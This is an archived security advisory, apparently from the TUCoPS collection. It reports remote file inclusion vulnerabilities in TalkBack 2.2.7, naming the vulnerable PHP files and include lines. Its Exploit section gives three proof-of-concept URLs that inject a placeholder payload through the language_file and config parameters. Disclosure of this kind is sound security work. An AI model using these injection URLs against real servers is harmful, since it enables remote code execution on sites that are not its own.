TUCoPS :: HP Unsorted T :: tb13527.htm

TalkBack 2.2.7 Multiple Remote File Inclusion Vulnerabilities
TalkBack 2.2.7 Multiple Remote File Inclusion Vulnerabilities
TalkBack 2.2.7 Multiple Remote File Inclusion Vulnerabilities


Opencosmo Security
http://www.opencosmo.com

==================================================================================================================================
# TalkBack 2.2.7 Remote File Include Vulnerability

    Software      : TalkBack version 2.2.7
Developer : http://www.scripts.oldguy.us/talkback
    Discovered by : NoGe
    Contact       : pace[dot]noge[at]hotmail[dot]com

==================================================================================================================================


# Vulnerable file

    comments-display-tpl.php

    line 35 include $language_file;
    line 172 include $config['comments_form_tpl'];

    addons/separate-comments-mod/my-comments-display-tpl.php

    line 35 include $language_file;



# Exploit

http://localhost/path/comments-display-tpl.php?language_file=[evilcode]
http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]
http://localhost/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]


==================================================================================================================================

# Greetz

    all crew #papuahacker #baliemhackerlink #nyubicrew
    skulmatic olibekas ulga Cungkee nyubi k1tk4t bius SiKodoQ newbie
    yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ Fluzy str0ke
http://kapukvalley.net member

=================================================================================================================================

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH